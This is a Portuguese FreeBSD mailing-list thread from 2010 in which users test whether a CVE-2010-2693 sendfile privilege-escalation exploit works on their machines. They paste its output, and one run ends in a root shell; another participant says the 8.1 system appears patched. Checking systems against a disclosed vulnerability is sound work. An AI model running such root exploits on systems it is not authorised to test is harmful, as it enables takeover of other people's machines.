Em 22/8/2010 19:25, Renato Frederick escreveu: > funciona no 8.1 nao garga: > > FreeBSD koopa.frederick.eti.br 8.1-STABLE FreeBSD 8.1-STABLE #0: Thu Aug > 19 19:53:16 BRT 2010 > [email protected]:/usr/src/sys/i386/compile/KOOPA i386 > > > $ whoami > frederick > > $ ./cve-2010-2693 > [+] checking for setuid /usr/bin/su binary... > [+] checking for suitable libc library in /lib... > [+] found libc at /lib/libc.so.7 > [+] found getuid function at 0x00049b08 > [+] target: 0x00049b08, adjusted: 0x00049308, writes: 1171 > [+] spawning listener thread... > [+] connecting to listener thread... > [+] initiating exploit via sendfile... > [+] exploit complete! > [+] spawning root shell... > Password: > > > Em 22/08/10 19:18, Renato Botelho escreveu: >> 2010/8/22 Leandro Keffer<[email protected]> >> >>> Testado em um 8.0 branch 3 e funcionando : ( >>> >>> FreeBSD fbsd80.keffer.local 8.0-RELEASE-p3 FreeBSD 8.0-RELEASE-p3 #0: Tue >>> May 25 20:54:11 UTC 2010 >>> [email protected]:/usr/obj/usr/src/sys/GENERIC >>> amd64 >>> >>> [kef...@fbsd80 /usr/home/keffer]$ ./cve-2010-2693 >>> [+] checking for setuid /usr/bin/su binary... >>> [+] checking for suitable libc library in /lib... >>> [+] found libc at /lib/libc.so.7 >>> [+] found getuid function at 0x00056990 >>> [+] target: 0x00056990, adjusted: 0x00056190, writes: 1377 >>> [+] spawning listener thread... >>> [+] connecting to listener thread... >>> [+] initiating exploit via sendfile... >>> [+] exploit complete! >>> [+] spawning root shell... >>> fbsd80# id >>> uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) >>> >>> >> Sabe se rola no 8.1-RELEASE? >> > ------------------------- > Histórico: http://www.fug.com.br/historico/html/freebsd/ > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
Frederick, Acredito que seu sistema esteja patcheado quanto a essa falha. No advisory diz que todos a partir do 7.X. -- Anderson Eduardo Diretor Geral Tel.: +55 (71) 3641-6450 Secover - Serviços em TI e Segurança da Informação http://www.secover.com.br ------------------------- Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
